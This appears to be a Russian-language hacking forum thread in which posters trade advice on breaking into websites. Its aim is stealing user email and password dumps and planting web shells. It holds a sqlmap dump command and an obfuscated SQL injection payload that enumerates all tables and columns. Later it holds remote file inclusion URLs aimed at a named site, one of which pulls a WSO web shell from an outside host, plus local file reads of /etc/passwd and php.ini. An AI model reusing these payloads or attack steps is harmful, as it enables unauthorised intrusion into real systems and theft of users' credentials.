Слышал что можно залить шелл на прямую (без доступа в админку) , если есть скуля... Кто что скажет по этому поводу ?
Имеем скулю Нужно сдампить mail,pass. Пробую через sqlmap - вот что выходит http://clip2net.com/s/6P9XZ6 При чем, если дампить отдельно, или mail, или pass то все норм. Через havij не вариант, он долго думает, особенно при сохранении больших дампов. Как решить проблему? За ранее спасибо
OxoTnik Code: python sqlmap.py -u http://site.com/index.php?i=-1 --dump -D db_name -T table_name -C "column1,column2"
Так зачем скульмап, если можно одним запросом вывести все таблици и колонки. В принтабельное поле вставляешь. (%73elect(@x)%66rom(%73elect(@x:=0x00),(%73elect(null)%66rom(%69nformation_schema.%63olumns)%77here(%74able_schema!=0x696e666f726d6174696f6e5f736368656d61)%61nd(0x00)%69n(@x:=%63oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,%63olumn_name))))x)
Кажется разобрался, походу эта трабла возникла из-за неравного кол-ва колонок. Задал параметры start=1 и stop= чуть меньше, чем coun column Главное что бы теперь ничего не перемешалось А залиться не получается. Нет прав на запись
подскажите софт чтоб залить бд себе на машину.. пробовал через havij, но это нереально долго.. какие есть предложения?
И снова здравствуйте. mysqldump, входящий в стандратную поставку mysql-клиента. Если речь о mysql, конечно.
Добрый вечер Подскажите пожалуйста как брутят и добывают шеллы или Ftp доступы?! Сканил сайт webcruiserom скулю находит раскрутить не может..Помогите чайнику(
софт раскручивает самые обычные и самые стандартные скули... Если ручками раскручивать скули не умеешь, то и от софта будет не много толку. Возможно какие-то символы фильтруются.. например имя таблицы.. это исправляется зашифровкой имени таблицы в hex. А вообще так сказать сложно..выложи скулю.. тебе скажут в чем проблема
Брутят, вы не поверите, брутом. Все тупо до безобразия. Фтп как правило тырят ботами с машин. Шеллы массово - через дыры в популярных цмс. Сканер выкидывайте и учитесь работать руками. Когда сможете написать свой или с первого взгляда описать алгоритм любого такого сканера - тогда и будет толк от их использования.
Допустим есть myadmin/setup/ и вроде есть права на запись config.inc.php. Но при переходе по MyAdmin//config/config.inc.php 404 error. что можно сделать?
Как в sqlmap сделать ,чтоб при сканировании ссылки sqlmap использовал union не такой простой ,а такой /*!union*/
Приветствую,вообщем нужно мне подтянуть знания по RFI Вопрос собственно -как проинклюдить ,почему не получается и как можно решить? Для примера нашел вот h**p://careers.ieee.org/test/redesign/proxy.php?url=http://files.xakep.biz/shells/PHP/wso.txt
просто читалка. http://careers.ieee.org/test/redesign/proxy.php?url=/etc/passwd http://careers.ieee.org/test/redesign/proxy.php?url=http://www.spenneberg.org/phpinfo.txt
Вьехал, тогда буду LFI использовать. Интересно было просто почему команды не выполняются при RFI инклюде. А читалкой поищу что-нибудь полезное ) http://careers.ieee.org/test/redesign/proxy.php?url=/usr/local/lib/php.ini
